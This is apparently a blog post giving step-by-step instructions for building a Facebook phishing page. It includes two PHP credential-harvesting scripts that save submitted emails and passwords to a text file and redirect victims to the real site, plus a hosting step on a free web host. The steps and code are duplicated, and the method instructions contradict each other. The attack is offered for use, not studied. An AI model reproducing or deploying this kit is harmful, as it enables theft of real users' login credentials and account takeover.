Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="hello.php"
Step6 : now open a notepad and type following as it is.
1 type
------
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
or
2nd type
---------------
<html> <body> <?php $handle = fopen("lol.txt", "a");
fwrite($handle,$_POST["email"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["pass"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>
NOW save this as hello.php
Login.html
hello.php
lol.txt
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="hello.php"
Step6 : now open a notepad and type following as it is.
1 type
------
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
or
2nd type
---------------
<html> <body> <?php $handle = fopen("lol.txt", "a");
fwrite($handle,$_POST["email"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["pass"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>
NOW save this as hello.php
Step7 : now make a account on http://members.000webhost.com/login.php and Upload
Login.html
hello.php
lol.txt
This comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete